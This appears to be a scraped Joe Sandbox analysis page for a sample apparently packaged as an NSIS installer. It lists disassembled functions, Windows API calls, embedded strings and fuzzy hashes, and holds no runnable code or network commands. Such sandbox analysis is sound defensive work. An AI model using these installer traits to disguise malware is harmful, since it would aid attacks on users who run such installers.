Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

~nsu.tmp, xrefs: 00403AF7
_?=, xrefs: 00403A64
Error launching installer, xrefs: 00403A7D
NCRC, xrefs: 0040397C
SeShutdownPrivilege, xrefs: 00403C16
\Temp, xrefs: 00403A1B
1C, xrefs: 00403B56
/D=, xrefs: 004039A6
NSIS Error, xrefs: 004038E2

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

detailprint: %s, xrefs: 00401679
CreateDirectory: "%s" created, xrefs: 00401849
SetFileAttributes failed., xrefs: 004017A1
Call: %d, xrefs: 0040165A
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: "%s" (%d), xrefs: 004017BF
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Aborting: "%s", xrefs: 0040161D
Rename failed: %s, xrefs: 0040194B
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Rename: %s, xrefs: 004018F8
Rename on reboot: %s, xrefs: 00401943
Jump: %d, xrefs: 00401602
Sleep(%d), xrefs: 0040169D
BringToFront, xrefs: 004016BD

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEdit20A, xrefs: 00405BB6, 00405BBB
.DEFAULT\Control Panel\International, xrefs: 00405999
.exe, xrefs: 00405A3D
RichEd20, xrefs: 00405B9D
RichEdit, xrefs: 00405BC4
_Nb, xrefs: 00405AD1
RichEd32, xrefs: 00405BA8
@%F, xrefs: 004059F6
B%F, xrefs: 00405A1F
@rD, xrefs: 00405965
Control Panel\Desktop\ResourceLocale, xrefs: 00405972

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,ForcesCompetitors,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,ForcesCompetitors,ForcesCompetitors,00000000,00000000,ForcesCompetitors,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: wrote %d to "%s", xrefs: 00401BD0
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
ForcesCompetitors, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53
File: error creating "%s", xrefs: 00401AF0
File: error, user retry, xrefs: 00401B40

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ForcesCompetitors
API String ID: 4286501637-1569952394
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Inst, xrefs: 0040366C
Error launching installer, xrefs: 004035D7
soft, xrefs: 00403675
Null, xrefs: 0040367E
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 0040343C
X1C, xrefs: 004033ED
P1B, xrefs: 004033A9
... %d%%, xrefs: 0040349E

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
